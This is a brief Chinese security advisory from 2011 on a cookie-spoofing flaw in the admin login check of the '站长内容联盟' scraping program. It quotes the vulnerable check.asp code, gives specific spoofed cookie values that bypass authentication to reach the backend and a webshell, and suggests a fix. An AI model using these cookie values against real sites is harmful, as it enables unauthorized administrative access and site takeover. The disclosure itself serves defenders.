站长内容联盟后台Cookie欺骗漏洞与利用
时间:2011-04-17 来源:yeweit6
发布日期:2011-04.17
发布作者:yeweit6
漏洞类型:Cookie欺骗
漏洞描述:站长内容联盟是国内使用最广泛的一套小偷程序,但是其后台验证不严格,通过cookie欺骗,可以绕过验证直接进入后台,拿到webshell。网站内容联盟,想必大多数站长都是知道的,或许都加入过一个或多个联盟。
验证文件 check.asp中的漏洞代码如下:
dim CheckAdmin,CheckAdminAll,Administer,tempAdmin,tadmin,Flag,Purview,AdminName if md5(request.cookies("rand")&request.cookies("AdminName")&request.cookies("adminid"))<>request.cookies("check") then errmsgerrmsg=errmsg+ "<BR>"+"<li>没有权限或登录超时,请按确定返回重新登录." call Error_Msg(Errmsg) response.end end if
cookie欺骗的漏洞很明显,只要rand+AdminName+adminid的md5密文与check匹配即可。
测试利用:
改cookie为check=802e5e662c4ebe86c497b15afe0b58fd; rand=1; AdminName=admin
修复:这样的系统建议用session验证,或者cookie验证时加上从数据库中读取的password。
标签分类:
相关阅读 更多 +
排行榜 更多 +